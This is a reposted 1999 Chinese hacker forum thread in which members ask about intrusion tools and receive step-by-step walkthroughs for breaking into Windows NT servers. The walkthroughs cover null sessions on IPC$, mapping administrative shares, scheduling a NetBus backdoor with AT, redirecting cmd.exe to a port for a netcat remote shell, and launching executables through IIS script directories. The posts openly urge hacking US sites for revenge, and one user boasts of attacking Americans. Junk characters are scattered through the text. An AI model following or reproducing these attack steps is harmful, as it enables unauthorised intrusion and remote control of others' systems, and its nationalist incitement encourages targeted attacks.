《版主頁(yè)黑客工具和文章的幾個(gè)問題》中提到:
0 m" i9 l" L" U, p& Q請(qǐng)教,從版主頁(yè)上載得PINGER���,GRINDER�����,LETMEIN等��,卻不能用��,PINGER安裝后���,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER��。EXE�����,40多K,運(yùn)行PINGER���,設(shè)置好IP�,點(diǎn)PING����,彈出一個(gè)窗口(C++�����。�����。����。),說出錯(cuò)����,然后關(guān)閉了����,何故�����,是不是安裝有誤��? 2����。運(yùn)行LETMEIN,彈出以下錯(cuò)誤:連接文件LETMEIN��。EXE到不存在的NETAPI32����。DLL;NETGROUPGETUSERS��。 是否說明需要NETAPI32����。DLL文件,哪里有該DLL�����。 3。USAKILLER 的教學(xué)文章中提到需在WINNT4��。0下運(yùn)行以下步驟等�����,是否要求我的操作系統(tǒng)也是WINNT4�����。0 ��,應(yīng)該不是吧��? 4�����。NC FOR NT 是否要求我的操作系統(tǒng)為NT�����,還是服務(wù)器的操作系統(tǒng)為NT�? 太多的問題需高手回答,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用��,實(shí)在窩囊哦���, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫更多的教學(xué)文章���,以提高我國(guó)黑客水平。
: D* y/ d u9 n% ?. Q8 U c> 我的機(jī)子MMX166�����,WIN98�,2。5G����,32M內(nèi)存。
+ w- m- `/ z V9 Q$ E3 F8 c% P
- N' T0 [0 l2 \% \4 n& r/ |, F黑客并不神秘�����,你只要了解操作系統(tǒng)��,學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn),輔助相關(guān)的工具���,就可以成功�。
2 c9 q/ n+ ^) B9 U你的問題是����,pinger, grinder, letmein等工具必須要在NT上運(yùn)行,我們強(qiáng)烈建議����,你一定要安裝NT,對(duì)于你的機(jī)器配制����,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存��,2G硬盤��。% y& }' K& ~- a' Z6 ~6 R2 t0 S
其實(shí)�,攻擊敵站���,利用其操作系統(tǒng)本身的工具就可以了�,比如,我們?cè)贜T上攻擊某服務(wù)器����,該服務(wù)器為NT4.0,我們將做如下簡(jiǎn)單事情就有可能成功��,假設(shè)目標(biāo)NT的IP地址為111.111.111.111���,做法如下:8 _- N; ]- O" L8 r, }/ ]2 L
net use \\111.111.111.111\ipc$ "" /user:""
/ m7 h+ G% v. `$ J; ?( }net.exe是NT的工具文件�,該命令將和目標(biāo)服務(wù)器建立Null Session���,如果成功�,你可以查看該服務(wù)器上的共享目錄:
# x7 Y, S) x9 K" x5 g/ tnet view \\111.111.111.111
2 L h! ~& [, K+ E' T當(dāng)然��,如果你有該NT管理員密碼��,就更好辦了�,假設(shè)其管理員Admin密碼為fuck:5 E( Z' \8 ?# a) J3 f4 a% ]' m
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
8 `3 U+ M3 C( @1 c2 g命令成功后,幾乎所有目標(biāo)NT上的配制��,資源�����,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來查看或修改:
. y1 x; I5 g7 ?" o9 v1、查看或修改遠(yuǎn)程機(jī)器上的硬盤�,假如目標(biāo)NT上有C、D兩個(gè)硬盤:- o7 t9 a( Z3 k$ h
net use x: \\111.111.111.111\c$
, \) S, V/ \" X. t, unet use y: \\111.111.111.111\d$
- N2 l4 N7 @6 Q這樣�����,目標(biāo)NT上的C��、D盤分別被影射為你本地的X����、Y盤,你想怎么做都可以...
" ^' m! w7 [; F+ u" l; ~. s$ _2�、管理目標(biāo)NT的用戶:
) N3 i( S# @8 \5 w6 `1 }$ @4 [從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
0 e( Q2 I! m% [& h* L鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以���,和管理你本地的一樣
* z. [, o' v e& U2 g3�、管理目標(biāo)NT的服務(wù)# i" s- \6 I$ @: G9 p- [% l
選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”8 U/ y- X6 j1 C T
這樣你可以管理目標(biāo)NT上的服務(wù)�,共享目錄
' D; c& `: ^* K Q! `4、IIS管理8 {" C) Y1 O8 Q: I
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.1117 c7 S3 u% V5 T: r0 U& r L
目標(biāo)NT的FTP����、WWW服務(wù)你就可以重新配置( _7 i( k% F8 W3 o/ ]
5���、事件管理
1 a2 |5 e5 v6 g- r6 O4 n“事件查看器”->連接到服務(wù)器->111.111.111.111
, ~7 U9 \- ~: s3 Z
& a$ f% @( W0 ?5 U. F5 e& @還有更多的東西����,都可以用NT本身的功能來完成,這些都是95, 98所不能實(shí)現(xiàn)的���。
6 D, t) J" g" d, a, R
. L: h9 r) X: V u當(dāng)然����,98,95也能做一些事情��,但很麻煩��,比如:
& {$ J) q2 x& Z# s/ xnet use \\111.111.111.111\ipc$
4 [8 f! d. f$ B# Anet use z: \\111.111.111.111\d$
; L5 x0 }$ @' n. @* O但其后不能帶參數(shù)�����,即改用其他用戶或密碼�����,系統(tǒng)將用當(dāng)前用戶和密碼去登錄��,如果你知道目標(biāo)NT的用戶或密碼���,重新啟動(dòng)95, 98�,改用該用戶和密碼登錄,方可實(shí)現(xiàn)����,你可以連接目標(biāo)NT上的共享資源,但不能進(jìn)行管理��,如用戶��、事件等. P5 S* M5 x2 O6 H
# f$ l( s! I6 b) x% q+ _* N2 S
我們強(qiáng)烈建議各位有心要為死難者報(bào)仇�����,真正的想黑霉國(guó)的站點(diǎn)�����,花點(diǎn)時(shí)間��,裝個(gè)NT吧���,NT Workstation也可以��!% ^& T: B4 q6 ]4 D1 b! q+ e8 d
這樣��,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用��!2 b: [0 ?7 B9 [7 @7 k) C
8 A6 U) @* i' E1 \' J' m1 i4 ^' B) B/ S1 ?* {
--------------------------------------------------------------------------------
$ u3 J/ Q6 v. G8 l4 c) D$ A* I* h9 `- \: D& z {
>quack于1999-06-12�����,23:37:44
- {, c$ [ w0 ]8 H在大作《幾個(gè)有關(guān)黑的問題》中提到:
5 h* @: {, g$ E首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無效,假定上傳其它"有益"美國(guó)NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國(guó)機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國(guó)鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個(gè)美國(guó)人,哈!�。
! ~# L- d9 F% S: t* e
% r) B! w. V4 g8 T5 c6 Vkillusa于1999-06-13�����,03:25:15
2 J2 k n7 o* k2 [" A5 a. w# \在大作《Re: 幾個(gè)有關(guān)黑的問題》中提到:
) Q( q0 q" q$ G* `
1 d) t ~5 I& a# \letmein.exe 暫時(shí)沒有mypwd參數(shù)����,十分抱歉
2 H3 |' h; a2 o- J" Ipinger程序,只是利用ping來尋找主機(jī)��,每臺(tái)NT服務(wù)器有一個(gè)主IP地址��,但也可以設(shè)置多個(gè)輔助IP地址����,比如有些服務(wù)器供應(yīng)商,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP���,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址���,就是該主機(jī)的主IP地址�����,所以有時(shí)顯示只有IP���,而無主機(jī)名。另外��,有些服務(wù)器是非NT的操作系統(tǒng)��,有時(shí)將不會(huì)顯示主機(jī)名��。當(dāng)然��,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置�����,也會(huì)出現(xiàn)上面的情況����。
; t, ]2 e9 W& l0 d# b! u1 ]: g% O" v* S/ N% y; z
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序����,所以��,netbus.exe是不用上傳的�����,只需在目的
9 V, j+ U2 Y/ R# q" j% ^- r服務(wù)器上運(yùn)行ntsrv.exe�,而在目的服務(wù)器運(yùn)行該程序有很多種方法:9 c, r& Q( P0 a2 ?3 s$ D. b
4 n4 f) K6 r% ~5 R- i8 O A1�、利用服務(wù)器的 Schedule 服務(wù)來啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序,具體使用方法��,可在自己的NT Dos窗口下鍵入以下:
/ Z1 Q$ ?2 b6 b( a' e' w$ Q1 K
1 B3 E1 v# v1 j9 l1 u. x, d& k/ `C:\>net start schedule
- H+ x3 `# q& A! s5 O v% vSchedule 正在啟動(dòng)服務(wù).....
% c) C; j2 H5 G/ \( Z, {! q4 L7 g) H/ \Schedulw 服務(wù)啟動(dòng)成功�。3 t+ u( P, K, W, C( B: A) e
C:\>at /?0 m% M& v/ D+ ~# e) f
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序。
& \. Y( o, H9 w, Z& Z0 g運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)���。
2 c) @" _* [8 l2 O! H1 K% P& _" U/ o4 H8 c4 a) @4 O
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
# i+ {( N F4 g5 O9 ]" y) O8 uAT [\\computername] time [/INTERACTIVE]( w9 j/ r; h0 | D
[ /EVERY:date[,...] | /NEXT:date[,...]] "command" k; S" X4 e [# t2 L2 k2 g
; F# P2 X# M: Q, G
\\computername 指定遠(yuǎn)程計(jì)算機(jī)����。 如果省略這個(gè)參數(shù)* e2 q& [0 x4 r+ X5 ]: ^. s
命令會(huì)被排定在本機(jī)上運(yùn)行����。- w4 H5 c, r* h" |
id 指定給排定進(jìn)度命令的識(shí)別號(hào)�。' |8 b9 S3 j( V' r! `# E
5 z7 }2 r' I, i, S' s
/delete 刪除某個(gè)已排定進(jìn)度的命令����。如果省略標(biāo)識(shí),計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除�����。 ]: b- q7 g; m* D s
/yes 用于刪除所有作業(yè)�����,且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 ����。/ @8 B' ]0 u' f( e: b7 e
time 指定命令運(yùn)行的時(shí)間。
* U. B- [, B1 d; ~ a/ ^( J/interactive 允許作業(yè)在運(yùn)行時(shí)��,與用戶通過桌面交互�����。
2 L7 E& C9 b6 B0 A: t
9 \/ C M- V! T+ @+ u! d/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令��。, A7 m) |" f1 [; c s6 \0 }
如果省略日期,則默認(rèn)為在每月的本日運(yùn)行����。
: M% v( R1 ]& c% {3 [& c8 `8 g1 L2 Z8 L1 Y* H9 v# W
/next:date[,...] 指定在下一個(gè)指定日期 (如,下周三)�����,運(yùn)行命令����。如果省略日期����,則默認(rèn)為在每月的本日運(yùn)行。; ~# r2 A W: o5 }. Y
# a- v$ V7 |0 U! K! _1 Q' y"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件�。
/ U5 q* T s. O. s0 \4 V+ t( F% l( S. \( e
C:\>
. ~* e& J/ n- r9 g8 x% H1 n. |% m7 V2 j0 a
知道了如何使用AT,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
6 S) L5 H, e" I% ^1 利用管理員登陸到目的服務(wù)器�,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
8 o) t1 G6 @2 j6 q) R2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start! b+ g6 _) _! {9 h: [: }
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行,當(dāng)然最快運(yùn)行最理想�,所以,你可以用letmein.exe得到服務(wù)器的時(shí)間���,然后:
3 ?2 j# s( S2 d! O0 U5 Mat \\x.x.x.x 00:00 ntsrv.exe /port:64321! X! z# h+ q8 ^8 w
其中00:00要改為用letmein.exe得回來的具體時(shí)間+一點(diǎn)容量�,等一會(huì)后,再在本地啟動(dòng)netbus.exe�����,鍵入目的服務(wù)器得ip地址或hostname���,連接�����!具體使用可參照 "How to get in nt"�,比如第一種方法���,你想要在目的服務(wù)器運(yùn)行 LEGION����,可以利用netbus得上傳功能���,將LEGION上傳至目的服務(wù)器�,再用netbus的"Start program"���,鍵入完整路徑的LEGION運(yùn)行程序���,就ok了���!第二種方法是利用netbus的“App redirect”功能,啟動(dòng)遠(yuǎn)程telnet服務(wù)����,如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe"����,Port為:4321,服務(wù)就啟動(dòng)了��,然后在本地運(yùn)行:nc x.x.x.x 4321�,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功:/ c$ `; l: U( v4 `' ~
Microsoft(R) Windows NT(TM)
/ W! r, r D4 [, [7 m(C) Copyright 1985-1996 Microsoft Corp.. e) L, p% ^+ U5 z
C:\>; w5 c0 G# x, _5 ^9 I
! d0 p" E; c( s- o5 d V
2�、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器
4 q' H/ c* U C. u s. F7 Y( ?
* I/ \& F' d+ }4 f, O% F* e將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄,如cgi-bin或scripts���,然后在瀏覽器鍵入url如:
! x8 v0 r' j+ O" c& nhttp://x.x.x.x/scripts/ntsrv.exe /port:64321
0 W8 ~' W% Z7 Q* }1 R6 i/ v8 d或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:643214 X/ z6 [8 v) ?& K8 l% ^
該程序就啟動(dòng)了
6 j# I6 }2 G, O; u) J; f6 j4 n' R4 _8 _& T, t5 C$ @
我只提這幾中方法��!- q9 L Z1 b5 E
要成功�����,必須打好基礎(chǔ)工�,對(duì)操作系統(tǒng)充分了解!: \# R. y' m/ M X$ [+ v3 A
+ t9 n& @: Z+ h5 J# k% z& a9 M |
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡